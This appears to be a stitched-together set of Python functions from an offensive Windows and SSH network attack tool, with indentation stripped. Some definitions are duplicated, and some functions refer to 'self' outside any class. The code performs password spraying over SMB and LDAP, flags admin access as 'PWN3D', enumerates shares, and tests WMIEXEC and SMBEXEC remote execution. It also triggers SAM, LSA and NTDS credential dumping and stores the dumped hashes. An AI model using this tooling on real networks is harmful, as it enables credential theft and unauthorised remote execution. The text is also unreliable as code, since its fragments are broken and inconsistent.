def smb_login(args, loggers, host, db, lockout_obj, config_obj):
status = ''
smb = SmbCon(args, loggers, host, db)
if smb.smb_connection():
smb.host_info()
try:
smb.login()
if smb.admin:
status = "({})".format(
highlight(config_obj.PWN3D_MSG, 'yellow'))
elif smb.auth and args.user:
status = "({})".format(highlight('Success', 'green'))
except Exception as e:
e = str(e).lower()
lockout_obj.failed_login(host, str(e).lower())
if "password_expired" in e:
status = "({})".format(highlight('Password_Expired', 'yellow'))
elif "logon_failure" in e:
lockout_obj.add_attempt()
status = "({})".format(highlight('Failed', 'red'))
elif "account_disabled" in e:
status = "({})".format(highlight('Account_Disabled', 'red'))
loggers['console'].info([
smb.host, smb.ip, "ENUM", "{} {} ".format(smb.os, smb.os_arch),
"(Domain: {})".format(smb.srvdomain),
"(Signing: {})".format(str(smb.signing)),
"(SMBv1: {})".format(str(smb.smbv1)), status
])
return smb
else:
raise Exception('Connection to Server Failed')
def failed_login(self, host, error):
if "account_locked_out" in error:
self.logger.warning([host, host, "Lockout Tracker", highlight("Account Locked: {}\{}".format(self.domain, self.username), 'red')])
_exit(1)
elif "access_denied" in error:
self.logger.verbose([host, host, "LOCKOUT TRACKER", highlight("Access Denied: Insufficient privileges (User: \"{}\":\"{}\")".format(self.username, self.password), 'red')])
else:
self.logger.verbose([host, host, "LOCKOUT TRACKER", highlight(error, 'red')])
def run(self, target, args, smb_con, loggers):
logger = loggers['console']
# Log Results
self.exec_method = {
WMIEXEC: {
'Name': 'WMIEXEC',
'Fileless': '\033[1;31mFAILED\033[0m',
'Remote': '\033[1;31mFAILED\033[0m'
},
SMBEXEC: {
'Name': 'SMBEXEC',
'Fileless': '\033[1;31mFAILED\033[0m',
'Remote': '\033[1;31mFAILED\033[0m'
}
}
# Defile filed/fileless via share
self.exec_type = {'Remote': '', 'Fileless': gen_random_string()}
# Verify Admin
if not smb_con.admin:
logger.warning(
"{} Error: This module can only be run on a system with admin permissions"
.format(self.name))
return
# Start smbserver
smb_srv_obj = SMBServer(loggers['console'],
self.exec_type['Fileless'],
verbose=args.debug)
smb_srv_obj.start()
# Test execution method using threading for timeouts
try:
for exec_method in self.exec_method:
for exec_type in self.exec_type:
t = Thread(target=self.test_execution,
args=(args, smb_con, target, exec_method,
exec_type, logger))
t.start()
t.join(args.timeout + 3)
except Exception as e:
logger.debug("{} Error: {}".format(self.name, str(e)))
# Print Results
for xmethod, data in self.exec_method.items():
logger.info([
smb_con.host, smb_con.ip,
highlight(self.name.upper()),
' \033[1;30mExecution Method:\033[0m {:<10} \033[1;30mFileless: {:<20} \033[1;30mRemote (Defualt): {}'
.format(data['Name'], data['Fileless'], data['Remote'])
])
# Shutdown SMBServer and Exit
smb_srv_obj.cleanup_server()
smb_srv_obj.server = None
return
def share_finder(con, args, loggers, target):
valid_shares = []
target_shares = {}
try:
target_shares = share_perms(con)
for share, data in target_shares.items():
if data['read'] == 'READ' or data['write'] == 'WRITE':
loggers['console'].info([
con.host, con.ip, "SHAREFINDER",
"\\\\{}\\{}".format(con.host, share),
highlight("{:<5}{:<10}".format(data['read'],
data['write'])),
data['description']
])
else:
loggers['console'].info([
con.host, con.ip, "SHAREFINDER",
"\\\\{}\\{}".format(con.host, share),
highlight("{:<5}{:<10}".format(data['read'],
data['write'])),
data['description']
])
#Log all shares to enum.csv
loggers[args.mode].info(
"ShareFinder\t{}\t{}\t\\\\{}\\{}\t{}\t{}".format(
target, args.user, target, share, data['read'],
data['write'], data['description']))
if data['read'] == 'READ':
valid_shares.append(str(share))
except Exception as e:
loggers['console'].debug(
["\\\\{}".format(target), target_shares,
str(e)])
return valid_shares
def ssh_login(args, loggers, host, db, lockout_obj, config_obj):
status = ''
ssh = SSH(args, loggers, host, db)
if ssh.ssh_connection():
ssh.host_info()
try:
ssh.login()
if ssh.admin:
status = "({})".format(
highlight(config_obj.PWN3D_MSG, 'yellow'))
elif ssh.auth and args.user:
status = "({})".format(highlight('Success', 'green'))
except Exception as e:
e = str(e).lower()
if "authentication failed." in e and args.user:
status = "({})".format(highlight('Failed', 'red'))
elif "bad authentication type" in e and args.user:
status = "({})".format(highlight('Bad_Auth_Type', 'red'))
loggers['console'].info(
[ssh.host, ssh.ip, "ENUM", ssh.version, status])
return ssh
else:
raise Exception('Connection to Server Failed')
def run(self, target, args, smb_con, loggers, config_obj):
"""
Each module is executed from self.run, and passed the following arguments:
target - Current target in enumration process
args - Command line args
smb_con - Active SMB Connection
loggers - Dictionary of queues used to output data
loggers['console'] - Write data to terminal
loggers['enum] - Write data to log file enum.csv
Once Complete, Add the module to the _Modules dictionary in ar3.modules.__init__.py
"""
loggers['console'].success([
smb_con.host, smb_con.ip,
highlight(self.name.upper()),
"Example Module Output: {}".format(self.args['ARGUMENTS']['Value'])
])
def spray(auth_args, loggers, db_obj, config_obj, target, user, passwd):
try:
if auth_args.method.lower() == "ldap":
con = LdapCon(auth_args, loggers, target, db_obj)
con.create_ldap_con()
elif auth_args.method.lower() == 'smb':
con = SmbCon(auth_args, loggers, target, db_obj)
con.create_smb_con()
if auth_args.hash: passwd = auth_args.hash
if hasattr(con, 'admin')and con.admin == True:
loggers['console'].success([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight(config_obj.PWN3D_MSG, 'yellow'))])
else:
loggers['console'].success([con.host, con.ip, auth_args.method.upper(),'{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight("SUCCESS", "green"))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tSuccess".format(get_timestamp(), target, auth_args.domain, user, passwd))
con.close()
except KeyboardInterrupt:
print("\n[!] Key Event Detected, Closing...")
try:
con.close()
except:
pass
_exit(0)
except Exception as e:
# Overwrite pwd value for output
if auth_args.hash: passwd = auth_args.hash
if "password has expired" in str(e).lower():
loggers['console'].success2([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("PASSWORD EXPIRED", color='yellow'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tPassword Expired".format(get_timestamp(), target, auth_args.domain, user, passwd))
elif "account_locked_out" in str(e).lower():
loggers['console'].warning([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("ACCOUNT LOCKED", color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tAccount Locked".format(get_timestamp(), target, auth_args.domain, user, passwd))
elif str(e) == "Connection to Server Failed":
loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("CONNECTION ERROR", color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tConnection Error".format(get_timestamp(), target, auth_args.domain, user, passwd))
elif "status_logon_failure" in str(e).lower() or "invalidCredentials" in str(e).lower():
loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("FAILED", color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tLogin Failed".format(get_timestamp(), target, auth_args.domain, user, passwd))
else:
loggers['console'].debug([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight(str(e), color='red'))])
loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\t{}".format(get_timestamp(), target, auth_args.domain, user, passwd, str(e)))
sleep(auth_args.jitter)
del auth_args
def host_enum(target, args, lockout, config_obj, db_obj, loggers):
try:
# OS Enumeration
try:
con = login(args, loggers, target, db_obj, lockout)
if con.admin:
loggers['console'].success([con.host, con.ip, "ENUM", con.os + con.os_arch, "(Domain: {})".format(con.srvdomain), "(Signing: {})".format(str(con.signing)), "(SMBv1: {})".format(str(con.smbv1)), "({})".format(highlight(config_obj.PWN3D_MSG, 'yellow'))])
else:
loggers['console'].info([con.host, con.ip, "ENUM", con.os + con.os_arch, "(Domain: {})".format(con.srvdomain),"(Signing: {})".format(str(con.signing)), "(SMBv1: {})".format(str(con.smbv1))])
except Exception as e:
return []
# Sharefinder
shares = []
if args.share:
shares = args.share.split(",")
for share in shares:
loggers['console'].info([con.host, con.ip, "USER_SHARES", "\\\\{}\\{}".format(con.host, share)])
elif args.sharefinder or args.spider:
shares = share_finder(con, args, loggers, target)
# Secondary actions
if args.gen_relay_list and not con.signing:
loggers['relay_list'].info(con.host)
if args.passpol:
password_policy(con, args, db_obj, loggers)
if args.sam:
extract_sam(con, args, target, loggers)
if args.ntds:
extract_ntds(con, args, target, loggers)
if args.loggedon:
loggedon_users(con, args, target, loggers)
if args.sessions:
active_sessions(con, args, target, loggers)
if args.list_processes:
tasklist(con, args, loggers)
if args.wmi_query:
wmi_query(con, args, target, loggers)
if args.execute:
code_execution(con, args, target, loggers, config_obj)
if args.ps_execute:
ps_execution(con, args, target, loggers, config_obj)
if args.module:
execute_module(con, args, target, loggers, config_obj)
# Close connections & return
try:
con.con.logoff()
except:
pass
con.close()
loggers['console'].debug("Shares returned for: {} {}".format(target, shares))
return shares
except KeyboardInterrupt:
try:
con.close()
except:
pass
_exit(0)
except Exception as e:
loggers['console'].debug(str(e))
def host_enum(target, args, lockout, config_obj, db_obj, loggers):
# @TODO refactor
try:
try:
if args.exec_method == 'ssh':
con = ssh_login(args, loggers, target, db_obj, lockout,
config_obj)
else:
con = smb_login(args, loggers, target, db_obj, lockout,
config_obj)
except Exception as e:
loggers['console'].debug(
[target, target, "ENUM",
highlight(str(e), 'red')])
return []
shares = []
if args.exec_method == 'ssh' and con.auth:
if args.execute:
con.admin = True # Override admin to allow execution
code_execution(con, args, target, loggers, config_obj,
args.execute)
return []
elif con.auth:
# Sharefinder
if args.share:
shares = args.share.split(",")
for share in shares:
loggers['console'].info([
con.host, con.ip, "SHAREFINDER",
"\\\\{}\\{}".format(con.host, share)
])
elif args.sharefinder or args.spider:
shares = share_finder(con, args, loggers, target)
# Secondary actions
if args.passpol:
password_policy(con, args, db_obj, loggers)
if args.sam:
extract_sam(con, args, target, loggers)
if args.lsa:
extract_lsa(con, args, target, loggers)
if args.ntds:
extract_ntds(con, args, target, loggers)
if args.loggedon:
loggedon_users(con, args, target, loggers)
if args.sessions:
active_sessions(con, args, target, loggers)
if args.list_processes:
tasklist(con, args, loggers)
if args.list_services:
list_services(con, args, loggers, target)
if args.local_groups:
get_netlocalgroups(con, args, target, loggers)
if args.local_members:
localgroup_members(con, args, target, loggers)
if args.wmi_query:
wmi_query(con, args, target, loggers)
if args.execute:
code_execution(con, args, target, loggers, config_obj,
args.execute)
if args.ps_execute:
ps_execution(con, args, target, loggers, config_obj)
if args.module:
execute_module(con, args, target, loggers, config_obj)
# Close connections & return
try:
con.con.logoff()
except:
pass
con.close()
loggers['console'].debug("Shares returned for: {} {}".format(
target, shares))
return shares
except KeyboardInterrupt:
try:
con.close()
except:
pass
_exit(0)
except Exception as e:
loggers['console'].debug(str(e))
def add_sam_hash(sam_hash, host_id):
self.logger.success(
[self.host, highlight("SAM HASH"), sam_hash])
username, _, lmhash, nthash, _, _, _ = sam_hash.split(':')
self.db.update_user(username, '', host_id,
"{}:{}".format(lmhash, nthash))
